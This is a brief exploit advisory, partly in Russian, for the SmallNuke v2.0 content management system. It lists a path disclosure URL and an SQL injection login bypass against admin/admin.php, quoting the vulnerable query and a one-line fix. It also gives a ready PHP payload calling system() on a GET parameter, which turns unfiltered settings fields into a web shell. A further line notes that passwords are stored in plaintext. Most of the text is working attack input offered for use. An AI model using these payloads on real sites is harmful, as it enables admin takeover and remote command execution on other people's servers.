SmallNuke v2.0 Final (may be later)

site : http://smallnuke.com/

google : SmallNuke is a free software released under the GNU/GPL.

Bug : SQL-injection, Web shell

1) PATH
index.php?go=Search&modname=test&query=E133Team

2) SQL-injection
admin/admin.php
login : ' OR 1=1 /*
pass :

magic_quotes_gpc == off

admin/admin.php
42 if(isset($_POST['enter_admin'])) {
43 $key1 = $_POST['admin_name'];
44 $key2 = $_POST['admin_password'];
45
46 $code_password = md5($key2);
47 $sql = "SELECT admin_id, login, password FROM ".$conf['prefix']."_admins WHERE login='$key1' AND password='$code_password'";

change to
43 $key1 = addslashes($_POST['admin_name']);

3) Webshell how to
поля настройки не как не фильтруются
вводим в любое поле
";if ($_GET['e13']) {system($_GET['e13']);exit;}$test="
и получаем шелл по адресу
index.php?e13=команда
лучше пихать в ключевые слова сайта

4) Пароли хранятся в открытом виде